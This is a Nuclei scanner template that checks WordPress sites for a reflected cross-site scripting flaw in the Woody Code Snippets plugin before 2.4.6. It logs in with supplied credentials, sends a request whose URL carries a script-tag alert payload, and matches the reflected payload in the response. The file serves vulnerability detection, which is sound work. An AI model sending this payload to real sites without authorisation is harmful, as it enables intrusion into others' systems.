50 lines
1.6 KiB
YAML
50 lines
1.6 KiB
YAML
id: wp-insert-php-xss
|
|
|
|
info:
|
|
name: WordPress Woody Code Snippets <2.4.6 - Cross-Site Scripting
|
|
author: Akincibor,DhiyaneshDk
|
|
severity: high
|
|
description: WordPress Woody Code Snippets plugin before 2.4.6 contains a cross-site scripting vulnerability. It does not escape generated URLs before outputting them back in an attribute.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/6d6761b7-0c17-4428-8748-2179732030a3
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
tags: xss,wp,wordpress,authenticated,woody,wpscan,wp-plugin
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{RootURL}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
|
- |
|
|
GET /wp-admin/edit.php?post_type=wbcr-snippets&page=import-wbcr_insert_php&a"><script>alert(1)</script> HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'import-wbcr_insert_php&a\"><script>alert(1)</script>"'
|
|
- 'Woody Code Snippets Import'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100f43148e88934e4a4b63499ba660e26e04da80872d0f0436750f89e98b78b586e022030bac40cdb0fd0a988be025d21c197da11d05b3b918899b23d134fddb8001ea9:922c64590222798bb761d5b6d8e72950 |